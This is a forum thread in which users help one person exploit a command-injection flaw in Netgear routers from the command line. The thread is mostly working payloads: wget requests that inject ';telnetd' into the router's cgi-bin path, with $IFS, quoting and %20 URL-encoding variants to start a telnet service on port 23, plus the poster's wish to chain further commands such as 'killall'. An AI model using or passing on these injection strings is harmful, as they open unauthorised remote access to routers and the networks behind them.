wget/curl help? (netgear vuln)

[anode]

Been playing with the command injection vuln on the Netgear routers.  Works great from a browser.

I just have no chops with wget/curl. And would like to exploit via commandline.

I've tried:

wget http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS'23'

I've even tried lynx but no love there either.

[Jamo]

Wrapping it in single quotes might help; now shell considerest the `;` being part of the local shell command, not the wget/curl

wget 'http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS"23"'

 

[anode]

Thanks!!  Been messing around with quotes, and made some progress.

wget "-IP-/cgi-bin/;telnetd"

This works great.  But once I try to add/stack it fails.

The $IFS (space) matches on both the host and target

21 minutes ago, Jamo said:

Wrapping it in single quotes might help; now shell considerest the `;` being part of the local shell command, not the wget/curl

wget 'http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS"23"'

 

[digininja]

What do you mean matches?

[anode]

4 minutes ago, digininja said:

What do you mean matches?

$IFS is a space on both systems.

[digininja]

I think there is a translation issue, do you mean variable?

If you do, then using single quotes means the local shell won't treat it as a variable.

[anode]

I've swapped around the single double quotes in all sorts of combos.

$IFS as a shell variable.  Its equated to a space. (on both systems)  It works *perfectly* inside a web browser.

I'm trying to get it to work with wget or curl.

Getting telnet running on default port 23 is no prob.  But would be nice to add arguments and options to do a 'killall'

 

(and I *do* thank you for your all your help (globally here).  You're a good/helpful guy here.  ...When Diginija speak, hackers listen  (old US inside joke)

33 minutes ago, digininja said:

I think there is a translation issue, do you mean variable?

If you do, then using single quotes means the local shell won't treat it as a variable.

 

[digininja]

Either without quotes, or in double quotes, strings starting with dollar signs are treated as variables, in single quotes they are treated as literals as you can see in this screenshot.

 

What is your exact problem, from your last post it doesn't sound like it is the variables that are causing you the issues.

[digip]

On 1/29/2017 at 5:35 PM, kdodge said:

it looks like his trying to exec the telnetd on the router, you could try the %20 for a space

wget 'http:///cgi-bin/;telnetd%20-p%2023'

or just a regular space

wget 'http:///cgi-bin/;telnetd -p 23'

 

was going to suggest url encoding as you did. %27 for single quote(if needed anywhere) and %20 for spaces. Wrapping the whole request in single or double quotes should work with regular spaces though without the need for $IFS(whatever that is) unless $IFS was a needed part of the attack string/escape sequence.